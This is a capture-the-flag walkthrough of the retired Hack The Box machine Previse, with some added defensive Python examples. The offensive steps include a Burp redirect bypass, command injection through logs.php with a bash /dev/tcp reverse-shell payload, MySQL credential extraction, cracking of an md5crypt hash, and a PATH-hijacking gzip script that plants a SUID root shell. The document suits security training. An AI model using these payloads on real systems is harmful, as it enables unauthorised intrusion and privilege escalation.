Previse

Name: Previse
Release Date: 07 Aug 2021
Retire Date: 08 Jan 2022
OS: Linux
Base Points: Easy - Retired [0]
onurshin 00 days, 00 hours, 23 mins, 06 seconds
zime 00 days, 00 hours, 26 mins, 10 seconds
Creator: m4lwhere
Pentest Workshop PDF: Previse.pdf

Again, we start with AutoRecon: sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.104

Sidenote: Newer versions of Kali that do not run as root by default require sudo for the UDP port scans.

Ports 22/TCP (SSH) and 80/TCP (HTTP) come back open. Let's run Gobuster against the web server and navigate to http://10.10.11.104 while that runs.

  
┌──(kali㉿kali)-[~/Desktop/HTB/Previse]
└─$ gobuster dir -u http://10.10.11.104 -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "php" -s "200,204,301,302,307" -t50 -o previse.out

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.104
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/01/23 14:16:45 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 2801] [--> login.php]
/download.php         (Status: 302) [Size: 0] [--> login.php]   
/login.php            (Status: 200) [Size: 2224]                
/files.php            (Status: 302) [Size: 4914] [--> login.php]
/header.php           (Status: 200) [Size: 980]                 
/nav.php              (Status: 200) [Size: 1248]                
/footer.php           (Status: 200) [Size: 217]                 
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php           (Status: 302) [Size: 2966] [--> login.php]              
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.104/js/] 
/logout.php           (Status: 302) [Size: 0] [--> login.php]                 
/accounts.php         (Status: 302) [Size: 3994] [--> login.php]              
/config.php           (Status: 200) [Size: 0]                                 
/logs.php             (Status: 302) [Size: 0] [--> login.php]                 
/server-status        (Status: 403) [Size: 277]                               
                                                                              
===============================================================
2022/01/23 14:34:44 Finished
===============================================================

Looking at nav.php, we find a navigation bar with a link to create a new user. Trying to reach that page through a browser keeps redirecting us to login.php, but note the Gobuster result: accounts.php answers 302 yet returns a 3994-byte body, so the server renders the page before redirecting. If we intercept the request in Burp and do NOT follow the redirect, we can access the accounts.php page and create the account we need.

From that code, we know that we need to POST the fields username, password, confirm, and submit. A body of:

username=neocount&password=password&confirm=password&submit=

should do the trick to create a new user. Let's see if we can change the 302 response to a 200. Navigate directly to http://10.10.11.104/accounts.php and, when Burp intercepts the request, click the "hamburger" button, go to "Do Intercept", select "Response to this request", and click Forward. When the response comes up, change the status line from 302 Found to 200 OK and click Forward. Now you can interact with the account creation page.
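As an added example that is not part of the original write-up, a short Python check that parses the Gobuster lines above and flags the signature behind this bypass: a redirect status that still carries a page-sized body. The sample lines are copied from the scan output; the 512-byte threshold is an assumption.

```python
import re

# Sample lines copied from the gobuster output above (constructed list)
SCAN_LINES = [
    "/index.php            (Status: 302) [Size: 2801] [--> login.php]",
    "/download.php         (Status: 302) [Size: 0] [--> login.php]",
    "/login.php            (Status: 200) [Size: 2224]",
    "/accounts.php         (Status: 302) [Size: 3994] [--> login.php]",
    "/config.php           (Status: 200) [Size: 0]",
    "/server-status        (Status: 403) [Size: 277]",
]

# gobuster "dir" result line: path, status, size, optional redirect target
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\(Status: (?P<status>\d{3})\)\s+\[Size: (?P<size>\d+)\]"
    r"(?:\s+\[--> (?P<target>\S+)\])?"
)

def parse_line(line):
    """Return a dict for one gobuster result line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    return {"path": d["path"], "status": int(d["status"]),
            "size": int(d["size"]), "target": d["target"]}

def leaky_redirects(lines, min_body=512):
    """Paths that answer with a 3xx redirect but still return a sizeable body.

    A redirect whose body is as large as a normal page usually means the handler
    sent the Location header without stopping (in PHP: header() with no exit),
    so the protected content is served to any client that ignores the redirect.
    The threshold (assumed) filters the small bodies a real redirect may carry.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec and 300 <= rec["status"] < 400 and rec["size"] >= min_body:
            findings.append(rec["path"])
    return findings
```

Every path this reports should be fetched once with redirects disabled to confirm whether the body is the protected page or just a shared template.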

Now that we have an account, let's log in and see what we can use. There is a site backup file under the Files tab. Downloading it, we can look through the source and hopefully find a foothold. For example, logs.php calls PHP's exec() function. exec() runs a system command, in this case the log_process.py script, with the user-supplied delimiter appended to the command line, so the call can be hijacked to, hopefully, get a reverse shell foothold.

Under Management Menu > Log Data, the log export uses that function, which means we should be able to get a reverse shell callback by setting delim to:

delim=%3bbash+-c+'bash+-i+>%26+/dev/tcp/<YOUR TUN0 IP>/1337+0>%261'%3b

after starting a netcat listener on port 1337 on our machine. The Delimiter field is a drop-down, so we need to intercept the request with Burp again and edit the value there.
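Added example, not code from the box or the write-up: the difference between splicing delim into one command string (the exec() pattern above) and mapping the drop-down value through an allowlist into an argv list that runs without a shell. The delimiter names, the interpreter and the /opt/scripts/log_process.py path are assumptions.

```python
import shlex

# Constructed allowlist for the logs.php "delim" drop-down; the page does not
# list the option values, so these names and separators are assumptions.
DELIMS = {"comma": ",", "space": " ", "tab": "\t"}

# Interpreter and script path are assumptions; the write-up only names log_process.py.
LOG_SCRIPT = ["/usr/bin/python3", "/opt/scripts/log_process.py"]

# Shell control operators that end one command and start another
SHELL_SEPARATORS = {";", "|", "||", "&&", "&"}

def vulnerable_command(delim):
    """The pattern behind exec(): user input spliced into a single shell string."""
    return " ".join(LOG_SCRIPT) + " " + delim

def shell_separator_count(cmd):
    """Number of command separators a POSIX shell would honour in the string.

    Anything above zero means the 'delimiter' turned into extra commands.
    """
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return sum(1 for tok in lexer if tok in SHELL_SEPARATORS)

def safe_argv(delim_name):
    """Map the drop-down value through the allowlist and build argv.

    The list is meant for subprocess.run(argv) with no shell=True, so even a
    value that somehow bypassed the allowlist could not start a second command.
    """
    if delim_name not in DELIMS:
        raise ValueError(f"unsupported delimiter: {delim_name!r}")
    return LOG_SCRIPT + [DELIMS[delim_name]]

def accepts(delim_name):
    """True if the hardened path would run log_process.py for this value."""
    try:
        safe_argv(delim_name)
        return True
    except ValueError:
        return False
```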

The directory we land in (/var/www/html) has a config.php file. Reading it gives us the MySQL credentials. Quick find.

root:mySQL_p@ssw0rd!:)

Connecting to MySQL, we list the databases and check out the accounts table in the previse database.

mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'show databases;'
mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'show tables;'
mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'select * from accounts;'

Looking at accounts.php in the backup again, we find the exact hashing method: crypt() with a hard-coded md5crypt ($1$) salt.

$hash = crypt($password, '$1$🧂llol$');  // md5crypt with a fixed salt shared by every account
$db = connectDB();
if ($db === false) {
    die("ERROR: Could not connect. " . $db->connect_error);
}
$sql = "INSERT INTO accounts (username, password) VALUES ('{$username}','{$hash}')";
$result = $db->query($sql);

Now we just need to put the m4lwhere hash from the accounts table, '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.', into a hash file and crack it with John using the md5crypt format.

echo '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' > hash && john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash

m4lwhere:ilovecody112235!

With those credentials, log in as m4lwhere, grab the user.txt flag and start privesc enumeration.

m4lwhere@previse:~$ cat user.txt 
9618ea8ff392dadb2ed985a8a0b807cc

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere: 
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$

Unfortunately, access_backup.sh is owned by root, so we cannot modify it. However, we can read it, and it calls gzip by bare name to create the backup, so whichever gzip is found first in PATH is what runs as root. While we can't modify the script, we can drop our own gzip into a directory we control and put that directory at the front of PATH:

cd /tmp
export PATH=/tmp:$PATH
echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > gzip
chmod +x gzip
sudo /opt/scripts/access_backup.sh
./bash -p

bash-4.4# cat /root/root.txt 
1a0eebd484c0b843def6a26ba65afda8
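Added example, not the box's script: a Python audit that lists the external commands a shell script invokes by bare name, which is exactly what makes a sudo-allowed script like access_backup.sh hijackable through PATH. The sample script contents are constructed, since the page only says the real one is root-owned and uses gzip; the hardened variant shows the fix (fixed PATH, absolute command paths).

```python
import shlex

# Constructed stand-in for /opt/scripts/access_backup.sh: the write-up only says
# the real script is root-owned and uses gzip, so these lines are assumptions.
SAMPLE_SCRIPT = """#!/bin/bash
# back up the web access log (constructed example)
gzip -c /var/log/apache2/access.log > /var/backups/access.gz
date >> /var/backups/backup.log
/bin/chmod 600 /var/backups/access.gz
"""

# Same job, hardened: PATH pinned and every external command given by absolute path
HARDENED_SCRIPT = """#!/bin/bash
PATH=/usr/bin:/bin
/bin/gzip -c /var/log/apache2/access.log > /var/backups/access.gz
/bin/date >> /var/backups/backup.log
/bin/chmod 600 /var/backups/access.gz
"""

SHELL_KEYWORDS = {"if", "then", "else", "elif", "fi", "for", "in", "do", "done",
                  "while", "until", "case", "esac", "function", "{", "}", "!"}
BUILTINS = {"cd", "echo", "export", "exit", "set", "unset", "umask", "read",
            "true", "false", "trap", "shift", "return"}
SEPARATORS = {"|", "||", "&&", ";", "&", "(", ")"}

def path_dependent_commands(script_text):
    """Return the external commands the script invokes by bare name, in order.

    Each one is resolved through PATH at run time, so if the script runs under
    sudo with a caller-controlled PATH, a same-named binary planted earlier in
    PATH (the gzip trick above) executes as root. Comments are skipped by shlex.
    """
    found = []
    for line in script_text.splitlines():
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True
        expect_command = True  # first word of each simple command
        for tok in lexer:
            if tok in SEPARATORS:
                expect_command = True
            elif expect_command and tok not in SHELL_KEYWORDS and "=" not in tok:
                expect_command = False  # VAR=value prefixes do not end the search
                if not tok.startswith("/") and tok not in BUILTINS:
                    found.append(tok)
    return found
```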

Odd box. Grab the flag and celebrate!